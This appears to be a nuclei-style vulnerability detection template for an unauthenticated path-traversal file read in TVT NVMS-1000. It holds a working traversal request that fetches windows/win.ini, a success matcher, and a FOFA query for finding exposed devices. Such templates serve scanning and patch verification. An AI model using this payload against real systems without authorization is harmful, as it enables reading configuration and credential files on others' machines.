http:
    - matchers:
        - part: body
          type: word
          words:
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
id: TVT-NVMS-1000-File-reading
info:
    author: Superhero
    description: |-
        fofa: app="TVT-NVMS-1000"
        TVT数码科技 NVMS-1000 任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: TVT数码科技 NVMS-1000 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/Cg_pF_cq3-Gri7nBt4pJIg
    severity: high
    tags:
        - File reading
        - TVT
        - TVT-NVMS-1000
